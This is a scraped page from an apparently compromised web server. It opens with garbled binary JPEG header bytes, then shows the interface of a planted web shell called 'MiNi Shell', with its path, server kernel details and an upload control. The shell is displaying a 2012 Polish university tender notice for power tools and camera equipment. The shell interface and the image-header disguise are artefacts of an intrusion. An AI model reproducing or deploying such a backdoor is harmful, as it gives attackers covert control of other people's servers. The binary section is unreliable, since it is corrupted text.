JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120823/312080-N-2012.html

<p class="kh_header"><b>Warszawa: Dostawa elektronarzędzi i sprzętu fotograficznego</b><br>
<b>Numer ogłoszenia: 312080 - 2012; data zamieszczenia: 23.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojskowa Akademia Techniczna , ul. Kaliskiego 2, 00-908 Warszawa, woj. mazowieckie, tel. 022 6837865, faks 022 6837977.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wat.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa elektronarzędzi i sprzętu fotograficznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa elektronarzędzi i sprzętu fotograficznego

Zadanie nr 1:

Dostawa elektronarzędzi

1)	Sprężarka powietrza (mobilna)
-	Zamawiający wymaga aby urządzenie posiadało niezbędną dokumentację organów dozoru technicznego i oznakowanie (w tym symbol CE). Zawory bezpieczeństwa, przewody i pozostały osprzęt powinny spełniać wymagania przepisów o dozorze technicznym. Osprzęt ciśnieniowy urządzenia musi być dopuszczony do eksploatacji na obszarze Polski i posiadać niezbędną w tym zakresie dokumentację metrologiczną i oznakowanie (naniesione trwale).
-	Wykonawca dostarczy dokumenty sporządzone w języku polskim, wykonane w 2 egzemplarzach, w postaci drukowanej, wynikające z Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 9 lipca 2003 r. (Dz.U. nr 135 poz. 1269), określone w szczególności w §3 ust. 2 pkt 2, 3 i 5 oraz §4 pkt 4 i 5, pozwalające Zamawiającemu na zgłoszenie urządzenia do właściwej jednostki dozoru technicznego i uzyskanie decyzji zezwalającej na eksploatację.
-	Zamawiający w ramach dostawy wymaga instrukcji eksploatacji w języku polskim, dostarczonej przez Wykonawcę w postaci elektronicznej na CD, wykonanej zgodnie z §5 ust. 1 i 5 Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 9 lipca 2003 r. (Dz.U. nr 135 poz. 1269), zawierającej dodatkowo informacje o zasadzie działania urządzenia, jego budowie, niezbędnych materiałach eksploatacyjnych oraz punktach serwisowych na terenie Polski.
-	Sprężarka podczas dostawy musi być przygotowana do pracy tak, aby Wykonawca mógł w obecności Zamawiającego, przeprowadzić rozruch w pełni wyposażonego urządzenia w celu sprawdzenia działania i regulacji osprzętu zabezpieczającego i ciśnieniowego. Wykonawca w ramach pierwszego uruchomienia przeprowadzi nieodpłatne szkolenie z zakresu obsługi urządzenia dotyczące eksploatacji, przeglądów i bieżących prac obsługowych dla osób wskazanych przez Zamawiającego, zakończone wydaniem zaświadczeń o powyższym szkoleniu.

2)	Waga precyzyjna

Wszystkie parametry dokładnie opisane w załączniku nr 3 do SIWZ.


Zadanie nr 2:

Dostawa sprzętu fotograficznego

1)	Obiektyw szerokokątny
2)	Wielopowłokowy filtr polaryzacyjny
3)	Wielopowłokowy filtr UV typu Slim

Cały wymagany sprzęt przeznaczony do posiadanego przez Zamawiającego, aparatu Nikon D5100

Wszystkie parametry dokładnie opisane w załączniku nr 3A do SIWZ.

Dokumenty wymagane w ramach oferty na zadanie nr 1

- dokument informacyjny (karta katalogowa itp.) proponowanego produktu do poz. 1 SOPZ  
  zawierający:
a) pełną nazwę produktu;
b) nazwę producenta;
c) informację o parametrach techniczno-eksploatacyjnych urządzenia pozwalających na jego 
    ocenę poprzez porównanie z wymaganiami określonymi przez Zamawiającego;
- dokumenty dopuszczające urządzenie (z poz. 1 SOPZ) i jego osprzęt zabezpieczający oraz 
  ciśnieniowy, do eksploatacji na obszarze Polski, uzyskane od organów dozoru technicznego 
  i metrologii;
- oświadczenie o oznakowaniu urządzenia zgodnym z przepisami branżowymi, pozwalającym na 
  eksploatację na obszarze Polski.

Dokumenty wymagane podczas dostawy przedmiotu zamówienia zadania nr 1

- dokumenty dotyczące poz. 1 SOPZ, sporządzone w języku polskim, wykonane w 2  
  egzemplarzach, wynikające z Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z  
  dnia 9 lipca 2003 r. (Dz.U. nr 135 poz. 1269), określone w szczególności w §3 ust. 2 pkt 2, 3 i 5 
  oraz §4 pkt 4 i 5, niezbędne Zamawiającemu do zgłoszenia urządzenia do właściwej jednostki 
  dozoru technicznego i uzyskania decyzji zezwalającej na eksploatację;
- instrukcja eksploatacji do poz. 1 SOPZ, sporządzona w języku polskim w postaci elektronicznej na  
  CD, wykonana zgodnie z §5 ust. 1 i 5 Rozporządzenia Ministra Gospodarki, Pracy i Polityki 
  Społecznej z dnia 9 lipca 2003 r. (Dz.U. nr 135 poz. 1269), zawierająca dodatkowo informacje o 
  zasadzie działania urządzenia, jego budowie, niezbędnych materiałach eksploatacyjnych oraz 
  punktach serwisowych na terenie Polski;
- instrukcja eksploatacji do poz. 2 SOPZ;
- karta gwarancyjna do poz. 1 i 2 SOPZ;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 42.12.34.00-1, 38.31.00.00-1, 38.65.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 30.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.	Dokument informacyjny (karta katalogowa itp.) proponowanego produktu do Zadania nr 1 poz. 1 SOPZ zawierający:
a) pełną nazwę produktu;
b) nazwę producenta;
c) informację o parametrach techniczno-eksploatacyjnych urządzenia pozwalających na jego ocenę poprzez porównanie z wymaganiami określonymi przez Zamawiającego;
2.	Dokumenty dopuszczające urządzenie (z poz. 1 SOPZ) i jego osprzęt zabezpieczający oraz  ciśnieniowy, do eksploatacji na obszarze Polski, uzyskane od organów dozoru technicznego i metrologii
3.	Oświadczenie o oznakowaniu urządzenia zgodnym z przepisami branżowymi, pozwalającym na eksploatację na obszarze Polski</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta składana przez Wykonawcę winna zawierać:
1)	Formularz ofertowy stanowiący załącznik nr 1 do SIWZ,
2)	Szczegółowy opis przedmiotu zamówienia stanowiący załącznik nr 3, 3A do SIWZ, 
3)	pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z załączonych dokumentów wymaganych postanowieniami pkt 5 SIWZ.
4)	oświadczenia i dokumenty, w formie oryginału lub kserokopii wymienione w pkt 5 SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy, gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a które zostały przedstawione poniżej:

Zadanie nr 1

1.	Strony ustalają możliwość zmiany urządzeń wchodzących w skład przedmiotu zamówienia po podpisaniu umowy, pod warunkiem:
1)	wycofania ich z produkcji oraz zastąpienia tożsamymi lub nowocześniejszymi modelami 
o lepszych rozwiązaniach i parametrach techniczno-eksploatacyjnych, korzystniejszych dla Zamawiającego;
2)	koniecznością ich zmiany, spowodowaną przyczynami technicznymi, których nie można było przewidzieć przed podpisaniem niniejszej umowy.
2.	Zmiany do umowy nie mogą powodować:
1)	wzrostu wartości netto całości zamówienia, a także cen jednostkowych netto;
2)	terminu wykonania zamówienia;
3)	poniesienia dodatkowych kosztów przez Zamawiającego, wynikających w szczególności 
z konieczności zakupu innego, nieplanowanego asortymentu niezbędnego do uruchomienia   urządzeń będących przedmiotem zamówienia.
3.	Przez tożsame urządzenia zaproponowane przez Wykonawcę należy rozumieć takie, które charakteryzują się co najmniej parametrami techniczno-eksploatacyjnymi takimi samymi jak wyspecyfikowane w przyjętej przez Zamawiającego najkorzystniejszej ofercie 
o nowocześniejszych rozwiązaniach technicznych;
4.	Zmiany określone w ust. 3, muszą być dokonane z zachowaniem formy pisemnej poprzez podpisanie aneksu do umowy.



Zadanie nr 2

1.	Strony ustalają możliwość zmiany asortymentu wchodzącego w skład przedmiotu zamówienia po podpisaniu umowy, pod warunkiem:
3)	wycofania go z produkcji oraz zastąpienia tożsamymi lub nowocześniejszymi modelami 
o lepszych rozwiązaniach i parametrach techniczno-eksploatacyjnych, korzystniejszych dla Zamawiającego;
4)	koniecznością ich zmiany, spowodowaną przyczynami technicznymi, których nie można było przewidzieć przed podpisaniem niniejszej umowy.
2.	Zmiany do umowy nie mogą powodować:
1)	wzrostu wartości netto całości zamówienia, a także cen jednostkowych netto;
2)	terminu wykonania zamówienia;
3)	poniesienia dodatkowych kosztów przez Zamawiającego, wynikających w szczególności 
z konieczności zakupu innego, nieplanowanego wyposażenia niezbędnego do skutecznego wykorzystania asortymentu będącego przedmiotem zamówienia, w posiadanym aparacie fotograficznym NIKON D5100.
3.	Przez tożsamy asortyment zaproponowany przez Wykonawcę należy rozumieć taki, 
który charakteryzuje się co najmniej parametrami techniczno-eksploatacyjnymi takimi samymi jak wyspecyfikowany w przyjętej przez Zamawiającego najkorzystniejszej ofercie 
o nowocześniejszych rozwiązaniach technicznych;
4.	Zmiany określone w ust. 3, muszą być dokonane z zachowaniem formy pisemnej poprzez</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wat.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> WOJSKOWA AKADEMIA TECHNICZNA
im. Jarosława Dąbrowskiego
ul. Gen. Sylwestra Kaliskiego 2
00-908 WARSZAWA 
Sekcja Zamówień Publicznych, budynek nr 22, pokój nr 6, godz. 08:00-15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.08.2012 godzina 09:00, miejsce: WOJSKOWA AKADEMIA TECHNICZNA
im. Jarosława Dąbrowskiego
ul. Gen. Sylwestra Kaliskiego 2
00-908 WARSZAWA 
Sekcja Zamówień Publicznych, budynek nr 22, pokój nr 6, godz. 08:00-15:00.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com